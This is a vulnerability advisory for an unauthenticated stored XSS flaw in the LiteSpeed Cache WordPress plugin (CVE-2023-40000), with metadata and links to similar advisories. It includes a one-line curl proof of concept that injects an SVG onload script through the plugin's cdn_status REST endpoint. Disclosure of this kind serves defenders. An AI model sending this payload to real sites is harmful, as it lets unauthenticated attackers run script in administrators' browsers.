LiteSpeed Cache < 5.7.0.1 – Unauthenticated Stored XSS | CVE 2023-40000 | Plugin Vulnerabilities

Description

The plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'nameservers' and '_msg' parameters due to insufficient input sanitization and output escaping, allowing unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

Proof of Concept

curl -X POST --data 'success=0&result[_msg]=<svg/onload=alert(/XSS/)>' https://example.com/wp-json/litespeed/v1/cdn_status

The XSS will be triggered (once) when an admin will access any page of the backend

Affects Plugins

litespeed-cache

Fixed in 5.7.0.1

References

CVE

URL

https://patchstack.com/database/vulnerability/litespeed-cache/wordpress-litespeed-cache-plugin-5-7-unauthenticated-site-wide-stored-xss-vulnerability

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Rafie Muhammad

Verified

Yes

WPVDB ID

dd9054cc-1259-427d-a4ad-1875b7b2b3b4

Timeline

Publicly Published

2024-02-27 (about 1 year ago)

Added

2024-02-29 (about 1 year ago)

Last Updated

2024-02-29 (about 1 year ago)

Other

Published

Title

Published

2024-05-30

Title

WP Back Button <= 1.1.3 - Authenticated (Admin+) Stored Cross-Site Scripting

Published

2017-09-08

Title

MailChimp for WordPress <= 4.1.6 - Authenticated Cross-Site Scripting (XSS)

Published

2015-08-24

Title

Easy Coming Soon <= 1.8.1 - Authenticated Stored Cross-Site Scripting (XSS)

Published

2022-03-01

Title

Bank Mellat < 2.0.1 - Reflected Cross-Site Scripting

Published

2025-03-11

Title

WP Last Modified <= 0.1 - Authenticated (Administrator+) Stored Cross-Site Scripting